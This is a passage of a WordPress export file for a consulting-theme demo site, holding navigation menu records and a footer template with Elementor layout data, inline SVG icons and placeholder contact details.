		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1330]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[768]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Blog Post</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/blog-post/</link>
		<pubDate>Mon, 19 Oct 2020 06:55:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/2020/10/19/blog-post/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1345</wp:post_id>
		<wp:post_date><![CDATA[2020-10-19 06:55:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-19 06:55:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[blog-post]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>27</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1330]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[430]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Portfolio Details</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-details/</link>
		<pubDate>Mon, 19 Oct 2020 06:55:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/2020/10/19/portfolio-details/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1346</wp:post_id>
		<wp:post_date><![CDATA[2020-10-19 06:55:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-19 06:55:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[portfolio-details]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>17</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1340]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[837]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[ot_portfolio]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/1643/</link>
		<pubDate>Wed, 09 Dec 2020 09:14:26 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/?p=1643</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1643</wp:post_id>
		<wp:post_date><![CDATA[2020-12-09 09:14:26]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-09 09:14:26]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1643]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>1</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1023]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Footer 2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/ot_footer_builders/footer-2/</link>
		<pubDate>Wed, 16 Dec 2020 06:50:33 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/?post_type=ot_footer_builders&#038;p=1684</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz-consulting/">
					<img src="https://maxbizz.s3.amazonaws.com/images/02_White.svg" alt="Maxbizz Consulting">
				</a>			        
		<p>We make this belief a reality by putting clients first, leading with exceptional ideas, doing the right thing, and giving back.</p>		
					<a href="#" target="_blank" rel="noopener">
						Twitter
											</a>
					<a href="#" target="_blank" rel="noopener">
						Facebook-f
											</a>
					<a href="#" target="_blank" rel="noopener">
						Linkedin-in
											</a>
			<h6>About us</h6>		
					<ul>
							<li>
					<a href="#">					Contact us 
											</a>
									</li>
								<li>
					<a href="#">					Connect
											</a>
									</li>
								<li>
					<a href="#">					Subscribe
											</a>
									</li>
								<li>
					<a href="#">					Terms of use 
											</a>
									</li>
								<li>
					<a href="#">					Sitemap
											</a>
									</li>
						</ul>
					<ul>
							<li>
					<a href="#">					Careers
											</a>
									</li>
								<li>
					<a href="#">					Newsroom
											</a>
									</li>
								<li>
					<a href="#">					Case Studies
											</a>
									</li>
								<li>
					<a href="#">					Disclosures 
											</a>
									</li>
								<li>
					<a href="#">					Services
											</a>
									</li>
						</ul>
			<h6>Contacts</h6>		
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>				
				<h6>
					Visit Us Daily
				</h6>
								<p>411 University St, Seattle</p>
				<a href="tel:+1-800-456-478-23">
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>				</a>
				<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a>
				</h6>
								<p>+1-800-456-478-23</p>
				<a href="mailto:maxbizz@mail.com">
				<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
				<h6>
					<a href="mailto:maxbizz@mail.com">Mail Us</a>
				</h6>
								<p>maxbizz@mail.com</p>
			<h6>Subscribe</h6>		
		<p>Subscribe to our newsletter. Be always in trend!</p><p>Copyright © 2020 Maxbizz by OceanThemes. All Rights Reserved.</p>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1684</wp:post_id>
		<wp:post_date><![CDATA[2020-12-16 06:50:33]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-16 06:50:33]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[footer-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_footer_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.14]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"e1edfac","elType":"section","settings":{"structure":"40","background_background":"classic","background_color":"#16171E","padding":{"unit":"px","top":"190","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"fa0b1b6","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"3bd44a4","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02_White.svg","id":1416},"_margin":{"unit":"px","top":"0","right":"0","bottom":"32","left":"0","isLinked":false},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"},{"id":"53996f2","elType":"widget","settings":{"editor":"<p>We make this belief a reality by putting clients first, leading with exceptional ideas, doing the right thing, and giving back.<\/p>","text_color":"#C0C1C2","typography_typography":"custom","typography_line_height":{"unit":"px","size":30,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"816051d","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"0d77827","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"04b0949","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}},{"social_icon":{"value":"fab fa-linkedin-in","library":"fa-brands"},"_id":"d468e5b","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}}],"shape":"circle","align":"left","icon_size":{"unit":"px","size":12,"sizes":[]},"icon_padding":{"unit":"em","size":0.90000000000000002220446049250313080847263336181640625,"sizes":[]},"icon_spacing":{"unit":"px","size":14,"sizes":[]},"image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(0, 0, 0, 0.2)","icon_color":"custom","hover_primary_color":"#4B83FC","icon_secondary_color":"#FFFFFF","icon_primary_color":"#24262F","columns":"3"},"elements":[],"widgetType":"social-icons"}],"isInner":false},{"id":"6eaf297","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"2341019","elType":"widget","settings":{"title":"About us","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":22,"sizes":[]},"typography_font_weight":"600","_margin":{"unit":"px","top":"0","right":"0","bottom":"38","left":"0","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"991e59a","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"20"},"elements":[{"id":"274a593","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_mobile":50,"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"12","left":"0","isLinked":false}},"elements":[{"id":"294c732","elType":"widget","settings":{"icon_list":[{"text":"Contact us ","selected_icon":{"value":"","library":""},"_id":"dd541d7","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Connect","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"04c8029"},{"text":"Subscribe","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"0bf2a4d"},{"text":"Terms of use ","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"30f616c"},{"text":"Sitemap","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"5720c29"}],"space_between":{"unit":"px","size":10,"sizes":[]},"text_color":"#C0C1C2","text_color_hover":"#4B83FC","text_indent":{"unit":"px","size":0,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"icon-list"}],"isInner":true},{"id":"572ed4b","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_mobile":50},"elements":[{"id":"ed78392","elType":"widget","settings":{"icon_list":[{"text":"Careers","selected_icon":{"value":"","library":""},"_id":"dd541d7","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Newsroom","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"04c8029"},{"text":"Case Studies","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"0bf2a4d"},{"text":"Disclosures ","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"30f616c"},{"text":"Services","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"5720c29"}],"space_between":{"unit":"px","size":10,"sizes":[]},"text_color":"#C0C1C2","text_color_hover":"#4B83FC","text_indent":{"unit":"px","size":0,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"icon-list"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"feb5ce8","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"dd84059","elType":"widget","settings":{"title":"Contacts","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":22,"sizes":[]},"typography_font_weight":"600","_margin":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"8f75b15","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#4B83FC","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left"},"elements":[],"widgetType":"icon-box"},{"id":"6ddcdc7","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#4B83FC","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":21,"sizes":[]},"text_align_mobile":"left","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"},{"id":"353237a","elType":"widget","settings":{"title_text":"Mail Us","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#4B83FC","icon_size":{"unit":"px","size":20,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Inter","icon_space":{"unit":"px","size":22,"sizes":[]},"text_align_mobile":"left","link":{"url":"mailto:maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"}],"isInner":false},{"id":"8c6a41a","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"236aed3","elType":"widget","settings":{"title":"Subscribe","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":22,"sizes":[]},"typography_font_weight":"600","_margin":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"905ae27","elType":"widget","settings":{"wp":{"title":""},"_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"wp-widget-mc4wp_form_widget"},{"id":"5937a9d","elType":"widget","settings":{"editor":"<p>Subscribe to our newsletter. Be always in trend!<\/p>","text_color":"#C0C1C2"},"elements":[],"widgetType":"text-editor"}],"isInner":false}],"isInner":false},{"id":"5317af2","elType":"section","settings":{"background_background":"classic","background_color":"#16171E"},"elements":[{"id":"039b4bf","elType":"column","settings":{"_column_size":100,"_inline_size":null,"border_width":{"unit":"px","top":"1","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"d52d250","elType":"section","settings":{"layout":"full_width","border_border":"solid","border_width":{"unit":"px","top":"1","right":"0","bottom":"0","left":"0","isLinked":false},"border_color":"rgba(255, 255, 255, 0.1)","padding":{"unit":"px","top":"25","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[{"id":"d4a9880","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"7c5006f","elType":"widget","settings":{"editor":"<p>Copyright \u00a9 2020 Maxbizz by OceanThemes. All Rights Reserved.<\/p>","align":"center","text_color":"#929399","typography_typography":"custom","typography_font_size":{"unit":"px","size":15,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:3;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:3;s:21:"typography_typography";i:2;s:22:"typography_line_height";i:1;s:5:"align";i:1;s:20:"typography_font_size";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:2:{s:7:"content";a:1:{s:19:"section_social_icon";a:4:{s:16:"social_icon_list";i:1;s:5:"shape";i:1;s:5:"align";i:1;s:7:"columns";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:8:{s:9:"icon_size";i:1;s:12:"icon_padding";i:1;s:12:"icon_spacing";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:10:"icon_color";i:1;s:20:"icon_secondary_color";i:1;s:18:"icon_primary_color";i:1;}s:20:"section_social_hover";a:1:{s:19:"hover_primary_color";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:8;s:19:"_inline_size_tablet";i:4;s:19:"_inline_size_mobile";i:2;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:13:"margin_tablet";i:2;s:13:"margin_mobile";i:2;}}s:5:"style";a:1:{s:14:"section_border";a:1:{s:12:"border_width";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:3;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:3;s:11:"header_size";i:3;}}s:5:"style";a:1:{s:19:"section_title_style";a:4:{s:11:"title_color";i:3;s:21:"typography_typography";i:3;s:20:"typography_font_size";i:3;s:22:"typography_font_weight";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:3;s:14:"_margin_mobile";i:3;}}}}s:9:"icon-list";a:3:{s:5:"count";i:2;s:15:"control_percent";i:3;s:8:"controls";a:2:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:2;}}s:5:"style";a:2:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:2;}s:18:"section_text_style";a:5:{s:10:"text_color";i:2;s:16:"text_color_hover";i:2;s:11:"text_indent";i:2;s:26:"icon_typography_typography";i:2;s:25:"icon_typography_font_size";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:4;s: